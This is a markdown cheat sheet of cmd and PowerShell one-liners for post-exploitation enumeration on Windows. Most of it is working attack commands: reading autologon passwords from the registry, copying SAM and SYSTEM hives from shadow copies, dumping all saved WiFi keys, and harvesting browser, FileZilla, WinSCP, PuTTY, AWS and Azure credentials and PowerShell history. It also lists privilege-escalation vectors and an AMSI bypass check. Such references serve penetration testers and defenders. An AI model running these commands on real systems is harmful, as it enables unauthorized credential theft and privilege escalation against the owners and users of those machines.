windows-enumeration.md (15891B)
1 --- 2 title: "Windows Enumeration" 3 description: "Quick one-liners for post-exploitation enumeration on Windows systems." 4 category: enumeration 5 tags: ["enumeration", "privilege-escalation"] 6 tools: ["PowerShell"] 7 difficulty: intermediate 8 updated: "2026-08-10" 9 source: "vault:Enumeration/Windows Emumeration.md" 10 --- 11 # Windows Enumeration Cheat Sheet 12 13 Quick one-liners for post-exploitation enumeration on Windows systems. 14 15 --- 16 17 ## System Information 18 19 ```cmd 20 :: Basic system info 21 systeminfo 22 hostname 23 whoami /all 24 25 :: OS version and architecture 26 wmic os get caption,version,osarchitecture 27 [Environment]::Is64BitOperatingSystem 28 29 :: Installed patches/hotfixes 30 wmic qfe list full 31 wmic qfe get HotFixID,InstalledOn 32 33 :: Environment variables 34 set 35 Get-ChildItem Env: 36 37 :: Check if machine is domain-joined 38 systeminfo | findstr /B "Domain" 39 wmic computersystem get domain 40 ``` 41 42 --- 43 44 ## Current User Context 45 46 ```cmd 47 :: Who am I? 48 whoami 49 whoami /priv 50 whoami /groups 51 whoami /all 52 53 :: Current user's home directory 54 echo %USERPROFILE% 55 $env:USERPROFILE 56 57 :: Check for admin privileges 58 net session 2>nul && echo Admin || echo Not Admin 59 ``` 60 61 --- 62 63 ## Users and Groups 64 65 ```cmd 66 :: List all local users 67 net user 68 Get-LocalUser 69 70 :: Detailed user info 71 net user <username> 72 Get-LocalUser -Name <username> | Select-Object * 73 74 :: List all local groups 75 net localgroup 76 Get-LocalGroup 77 78 :: Members of specific groups 79 net localgroup Administrators 80 net localgroup "Remote Desktop Users" 81 net localgroup "Backup Operators" 82 Get-LocalGroupMember -Group "Administrators" 83 84 :: Domain users (if domain-joined) 85 net user /domain 86 net group /domain 87 net group "Domain Admins" /domain 88 net group "Enterprise Admins" /domain 89 ``` 90 91 --- 92 93 ## Network Information 94 95 ```cmd 96 :: IP configuration 97 ipconfig /all 98 Get-NetIPConfiguration 99 Get-NetIPAddress 100 101 :: Routing table 102 route print 103 Get-NetRoute 104 105 :: ARP cache 106 arp -a 107 Get-NetNeighbor 108 109 :: Active connections 110 netstat -ano 111 netstat -anob 112 Get-NetTCPConnection | Select-Object LocalAddress,LocalPort,RemoteAddress,RemotePort,State,OwningProcess 113 114 :: Listening ports 115 netstat -an | findstr LISTENING 116 Get-NetTCPConnection -State Listen 117 118 :: DNS cache 119 ipconfig /displaydns 120 121 :: Network shares 122 net share 123 Get-SmbShare 124 125 :: Connected shares 126 net use 127 Get-SmbConnection 128 129 :: Firewall status 130 netsh advfirewall show allprofiles 131 Get-NetFirewallProfile 132 133 :: Firewall rules 134 netsh advfirewall firewall show rule name=all 135 Get-NetFirewallRule | Where-Object {$_.Enabled -eq 'True'} 136 ``` 137 138 --- 139 140 ## Password Hunting 141 142 ### Common Credential Locations 143 144 ```powershell 145 # Search for files containing "password" 146 findstr /si "password" *.txt *.ini *.config *.xml *.cfg 147 findstr /spin "password" *.* 148 149 # Search entire C: drive (slow but thorough) 150 findstr /si /m "password" C:\*.txt C:\*.ini C:\*.config C:\*.xml 151 152 # PowerShell recursive search 153 Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.config,*.xml,*.cfg -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password" -ErrorAction SilentlyContinue 154 155 # Search for common credential patterns 156 findstr /si "pwd= pass= passwd= credentials" *.* 2>nul 157 findstr /si "connectionstring" *.config *.xml 2>nul 158 ``` 159 160 ### Unattended Installation Files 161 162 ```cmd 163 :: Classic unattend files (often contain plaintext/base64 passwords) 164 type C:\unattend.xml 165 type C:\Windows\Panther\unattend.xml 166 type C:\Windows\Panther\Unattend\unattend.xml 167 type C:\Windows\system32\sysprep.inf 168 type C:\Windows\system32\sysprep\sysprep.xml 169 170 :: Check all possible locations 171 dir /s /b C:\*unattend*.xml 2>nul 172 dir /s /b C:\*sysprep*.xml 2>nul 173 dir /s /b C:\*sysprep*.inf 2>nul 174 ``` 175 176 ### Web Config Files 177 178 ```cmd 179 :: IIS web.config files 180 type C:\inetpub\wwwroot\web.config 181 type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config 182 183 :: Find all web.config files 184 dir /s /b C:\web.config 2>nul 185 dir /s /b C:\inetpub\*.config 2>nul 186 187 :: Search for connection strings 188 findstr /si "connectionString" C:\inetpub\*.config 2>nul 189 ``` 190 191 ### Registry Stored Credentials 192 193 ```cmd 194 :: Autologon credentials 195 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName 196 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword 197 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon 198 199 :: VNC passwords 200 reg query "HKCU\Software\ORL\WinVNC3\Password" 2>nul 201 reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v Password 2>nul 202 reg query "HKLM\SOFTWARE\RealVNC\vncserver" /v Password 2>nul 203 204 :: Putty stored sessions 205 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s 206 207 :: SNMP community strings 208 reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities" 2>nul 209 210 :: Search registry for password strings 211 reg query HKLM /f password /t REG_SZ /s 2>nul 212 reg query HKCU /f password /t REG_SZ /s 2>nul 213 ``` 214 215 ### SAM and SYSTEM Files (requires SYSTEM privileges) 216 217 ```cmd 218 :: Check for backup SAM files 219 dir /s /b C:\Windows\repair\SAM 2>nul 220 dir /s /b C:\Windows\System32\config\RegBack\SAM 2>nul 221 222 :: Shadow copy SAM extraction 223 vssadmin list shadows 224 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM 225 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM 226 ``` 227 228 ### Credential Manager 229 230 ```cmd 231 :: List saved credentials 232 cmdkey /list 233 vaultcmd /listcreds:"Windows Credentials" /all 234 235 :: PowerShell credential manager enum 236 Get-ChildItem -Path C:\Users\*\AppData\Local\Microsoft\Credentials -Recurse -Force -ErrorAction SilentlyContinue 237 Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Credentials -Recurse -Force -ErrorAction SilentlyContinue 238 ``` 239 240 ### DPAPI Master Keys 241 242 ```powershell 243 # DPAPI master key locations 244 Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Protect -Recurse -Force -ErrorAction SilentlyContinue 245 Get-ChildItem -Path C:\Users\*\AppData\Local\Microsoft\Protect -Recurse -Force -ErrorAction SilentlyContinue 246 ``` 247 248 ### WiFi Passwords 249 250 ```cmd 251 :: List saved WiFi profiles 252 netsh wlan show profiles 253 254 :: Extract WiFi password (run for each profile) 255 netsh wlan show profile name="<SSID>" key=clear 256 257 :: One-liner to dump all WiFi passwords 258 for /f "tokens=2 delims=:" %a in ('netsh wlan show profiles ^| findstr "Profile"') do @netsh wlan show profile name=%a key=clear | findstr "Key Content" 259 ``` 260 261 ### Browser Credentials 262 263 ```cmd 264 :: Chrome saved passwords location 265 dir "C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\Login Data" 2>nul 266 267 :: Firefox profiles 268 dir "C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*" 2>nul 269 270 :: Edge passwords 271 dir "C:\Users\*\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" 2>nul 272 ``` 273 274 ### Common Application Credentials 275 276 ```cmd 277 :: FileZilla 278 type "C:\Users\*\AppData\Roaming\FileZilla\recentservers.xml" 2>nul 279 type "C:\Users\*\AppData\Roaming\FileZilla\sitemanager.xml" 2>nul 280 281 :: WinSCP 282 reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s 2>nul 283 284 :: mRemoteNG (encrypted but crackable) 285 type "C:\Users\*\AppData\Roaming\mRemoteNG\confCons.xml" 2>nul 286 287 :: RDP connection history 288 reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s 289 290 :: AWS credentials 291 type C:\Users\*\.aws\credentials 2>nul 292 293 :: Azure CLI 294 type C:\Users\*\.azure\accessTokens.json 2>nul 295 ``` 296 297 --- 298 299 ## PowerShell History 300 301 ```powershell 302 # Current user's PSReadLine history (most common) 303 type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 304 Get-Content (Get-PSReadLineOption).HistorySavePath 305 306 # All users' PowerShell history 307 Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { Write-Host "`n=== $($_.FullName) ===" -ForegroundColor Yellow; Get-Content $_ } 308 309 # Search history for interesting strings 310 Select-String -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -Pattern "password","credential","secret","key","token" -ErrorAction SilentlyContinue 311 312 # Transcript logs (if enabled) 313 Get-ChildItem -Path C:\Users\*\Documents\PowerShell_transcript* -ErrorAction SilentlyContinue 314 dir /s /b C:\*transcript*.txt 2>nul 315 ``` 316 317 --- 318 319 ## Scheduled Tasks 320 321 ```cmd 322 :: List all scheduled tasks 323 schtasks /query /fo LIST /v 324 Get-ScheduledTask | Where-Object {$_.State -ne "Disabled"} 325 326 :: Detailed task info 327 schtasks /query /tn "<taskname>" /fo LIST /v 328 Get-ScheduledTask -TaskName "<taskname>" | Get-ScheduledTaskInfo 329 330 :: Find tasks running as SYSTEM or high-priv users 331 schtasks /query /fo LIST /v | findstr /i "Task To Run: Run As User:" 332 333 # PowerShell - tasks with actions 334 Get-ScheduledTask | ForEach-Object { $task = $_; $_.Actions | ForEach-Object { [PSCustomObject]@{TaskName=$task.TaskName; Execute=$_.Execute; Arguments=$_.Arguments; RunAs=$task.Principal.UserId} }} 335 ``` 336 337 --- 338 339 ## Services 340 341 ```cmd 342 :: List all services 343 sc query state= all 344 Get-Service 345 wmic service list brief 346 347 :: Find services running as SYSTEM 348 wmic service get name,startname | findstr /i "LocalSystem" 349 350 :: Detailed service info 351 sc qc <servicename> 352 Get-Service -Name <servicename> | Select-Object * 353 Get-WmiObject win32_service | Where-Object {$_.Name -eq "<servicename>"} | Select-Object * 354 355 :: Find unquoted service paths 356 wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ 357 Get-WmiObject win32_service | Where-Object {$_.PathName -notlike "*`"*" -and $_.PathName -like "* *"} | Select-Object Name,PathName,StartMode 358 359 :: Service binary permissions (check with icacls) 360 for /f "tokens=2 delims='='" %a in ('wmic service list full ^| findstr /i "pathname" ^| findstr /i /v "system32"') do @echo %a >> c:\temp\services.txt 361 ``` 362 363 --- 364 365 ## Installed Software 366 367 ```cmd 368 :: Installed programs (32-bit and 64-bit) 369 wmic product get name,version 370 Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion 371 Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion 372 373 :: Programs in Program Files 374 dir "C:\Program Files" /b 375 dir "C:\Program Files (x86)" /b 376 377 :: Recently installed programs 378 Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Sort-Object InstallDate -Descending | Select-Object -First 20 DisplayName,InstallDate 379 ``` 380 381 --- 382 383 ## Processes 384 385 ```cmd 386 :: List all processes 387 tasklist /v 388 Get-Process | Select-Object ProcessName,Id,Path 389 390 :: Processes with owners 391 Get-WmiObject Win32_Process | Select-Object ProcessId,Name,@{N='Owner';E={$_.GetOwner().User}} 392 393 :: Find processes running as SYSTEM 394 tasklist /v | findstr /i "SYSTEM" 395 396 :: Process command lines 397 wmic process get processid,commandline 398 Get-WmiObject Win32_Process | Select-Object ProcessId,CommandLine 399 ``` 400 401 --- 402 403 ## Privilege Escalation Vectors 404 405 ### AlwaysInstallElevated 406 407 ```cmd 408 :: Check if AlwaysInstallElevated is set (both must be 1) 409 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2>nul 410 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2>nul 411 ``` 412 413 ### Token Privileges 414 415 ```powershell 416 # Check for dangerous privileges 417 whoami /priv | findstr /i "SeImpersonate SeAssignPrimaryToken SeBackup SeRestore SeDebug SeTakeOwnership SeLoadDriver" 418 419 # Commonly exploitable privileges: 420 # - SeImpersonatePrivilege -> Potato attacks 421 # - SeAssignPrimaryTokenPrivilege -> Token manipulation 422 # - SeBackupPrivilege -> Read any file 423 # - SeRestorePrivilege -> Write any file 424 # - SeDebugPrivilege -> Debug any process 425 # - SeTakeOwnershipPrivilege -> Take ownership of objects 426 # - SeLoadDriverPrivilege -> Load kernel drivers 427 ``` 428 429 ### Modifiable Services 430 431 ```powershell 432 # Find services with weak permissions (requires accesschk from Sysinternals) 433 accesschk.exe /accepteula -uwcqv "Authenticated Users" * 2>nul 434 accesschk.exe /accepteula -uwcqv "Everyone" * 2>nul 435 accesschk.exe /accepteula -uwcqv "Users" * 2>nul 436 437 # Check specific service 438 accesschk.exe /accepteula -ucqv <servicename> 439 ``` 440 441 ### PATH Hijacking 442 443 ```cmd 444 :: Check PATH for writable directories 445 echo %PATH% 446 $env:PATH -split ';' | ForEach-Object { if (Test-Path $_) { Get-Acl $_ | Select-Object Path,AccessToString } } 447 ``` 448 449 ### Startup Programs 450 451 ```cmd 452 :: Current user startup 453 dir "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" 454 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" 455 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" 456 457 :: All users startup 458 dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" 459 reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" 460 reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" 461 ``` 462 463 --- 464 465 ## Antivirus and Security 466 467 ```cmd 468 :: Windows Defender status 469 sc query WinDefend 470 Get-MpComputerStatus 471 472 :: Check for running AV processes 473 tasklist | findstr /i "avast avg avira bitdefender eset kaspersky malware mcafee norton sophos symantec trend" 474 475 :: AMSI bypass check 476 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').GetValue($null) 477 478 :: AppLocker policy 479 Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections 480 481 :: Check for Constrained Language Mode 482 $ExecutionContext.SessionState.LanguageMode 483 ``` 484 485 --- 486 487 ## Files and Directories of Interest 488 489 ```cmd 490 :: User directories 491 dir C:\Users /b 492 Get-ChildItem C:\Users -Directory 493 494 :: Desktop files (all users) 495 dir C:\Users\*\Desktop\*.* /s 2>nul 496 497 :: Documents (all users) 498 dir C:\Users\*\Documents\*.* /s 2>nul 499 500 :: Downloads (all users) 501 dir C:\Users\*\Downloads\*.* /s 2>nul 502 503 :: Recently accessed files 504 dir C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent\*.lnk 2>nul 505 506 :: Find interesting file extensions 507 dir /s /b C:\*.kdbx 2>nul 508 dir /s /b C:\*.pfx 2>nul 509 dir /s /b C:\*.ppk 2>nul 510 dir /s /b C:\*.pem 2>nul 511 dir /s /b C:\*.key 2>nul 512 dir /s /b C:\*password*.txt 2>nul 513 dir /s /b C:\*cred*.txt 2>nul 514 515 # PowerShell find interesting files 516 Get-ChildItem -Path C:\ -Include *.kdbx,*.pfx,*.ppk,*.pem,*.key -Recurse -ErrorAction SilentlyContinue 517 ``` 518 519 --- 520 521 ## Quick Wins - Combined Commands 522 523 ```powershell 524 # Dump everything to a file 525 systeminfo > enum.txt & whoami /all >> enum.txt & ipconfig /all >> enum.txt & netstat -ano >> enum.txt & net user >> enum.txt & net localgroup Administrators >> enum.txt 526 527 # Quick credential hunt 528 findstr /si "password=" *.xml *.ini *.txt *.config 2>nul 529 530 # Check for low-hanging fruit 531 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul | findstr /i "DefaultUserName DefaultPassword" 532 type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 2>nul 533 cmdkey /list 534 ``` 535 536 --- 537 538 ## Useful One-Liner Collection 539 540 ```powershell 541 # Find all writable directories in PATH 542 $env:PATH -split ';' | Where-Object { $_ } | ForEach-Object { try { if ((Get-Acl $_).Access | Where-Object { $_.FileSystemRights -match 'Write|FullControl' -and $_.IdentityReference -match 'Users|Everyone|Authenticated' }) { $_ } } catch {} } 543 544 # Find all files modified in last 7 days 545 Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) -and !$_.PSIsContainer } | Select-Object FullName,LastWriteTime 546 547 # Extract all IPs from files 548 Select-String -Path C:\*.txt,C:\*.log -Pattern '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b' -ErrorAction SilentlyContinue | Select-Object -Unique Matches 549 550 # Find files containing specific strings 551 Get-ChildItem -Path C:\Users -Recurse -Include *.txt,*.config,*.xml,*.ini -ErrorAction SilentlyContinue | Select-String -Pattern "password|credential|secret" -ErrorAction SilentlyContinue | Select-Object Path,LineNumber,Line 552 553 # Enum all services with binary paths outside System32 554 Get-WmiObject win32_service | Where-Object {$_.PathName -notmatch 'system32'} | Select-Object Name,PathName,State,StartMode 555 ``` 556 557 --- 558 559 _For automated enumeration, consider using tools like WinPEAS, PowerUp, Seatbelt, or SharpUp._